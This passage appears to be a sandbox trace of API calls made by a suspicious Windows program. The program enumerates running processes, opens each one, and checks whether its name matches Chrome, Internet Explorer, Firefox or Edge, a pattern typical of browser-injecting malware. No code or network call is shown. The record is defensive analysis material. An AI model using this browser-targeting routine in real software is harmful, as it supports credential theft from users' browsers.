	[0221.217] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.218] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.218] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5010
	[0221.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.219] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.219] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.220] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.220] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.220] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0221.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5014
	[0221.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.221] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0221.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.221] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.222] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0221.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.222] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.222] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5018
	[0221.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.223] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.223] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.224] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.225] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.225] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0221.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x501c
	[0221.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.226] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.226] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.226] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.227] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.227] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0221.228] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5020
	[0221.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.228] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0221.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.228] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.229] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0221.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.229] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.229] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5024
	[0221.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.230] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.230] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.231] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.231] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.231] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0221.232] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5028
	[0221.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.232] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0221.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.232] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.233] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0221.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.233] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.233] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0221.234] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x502c
	[0221.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.234] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0221.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.235] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.235] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0221.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.235] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.235] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0221.236] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5030
	[0221.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.236] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0221.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.236] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.237] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0221.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.237] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.237] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0221.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5034
	[0221.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.238] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0221.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.238] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.239] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0221.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.239] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.239] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0221.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0221.253] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0221.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5038
	[0221.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.254] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0221.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.255] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.255] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0221.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.256] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.256] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0221.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x503c
	[0221.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.257] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0221.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.257] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.258] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0221.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.258] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.258] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0221.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5040
	[0221.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.259] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0221.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.259] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.260] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0221.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.260] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.260] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0221.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5044
	[0221.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.261] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0221.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.262] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.262] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0221.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.262] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.262] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0221.263] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5048
	[0221.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.263] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0221.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.264] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.264] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0221.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.265] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.265] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0221.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x504c
	[0221.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.266] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0221.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.266] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.267] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0221.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.267] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.267] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0221.268] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5050
	[0221.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.268] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0221.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.268] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.269] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0221.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.269] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.270] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0221.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5054
	[0221.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.271] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0221.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.272] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.273] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0221.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.273] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0221.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5058
	[0221.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.275] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0221.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.275] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.275] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0221.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.275] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.276] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0221.276] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x505c
	[0221.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.276] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0221.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.277] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.277] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0221.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.277] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.277] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0221.278] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5060
	[0221.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.278] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0221.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.279] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.279] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0221.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.280] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.280] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0221.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5064
	[0221.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.281] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0221.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.281] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.282] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0221.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.282] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0221.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5068
	[0221.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.284] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0221.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.284] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.285] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0221.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.285] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.285] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0221.286] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x506c
	[0221.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.286] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0221.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.287] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.288] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0221.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
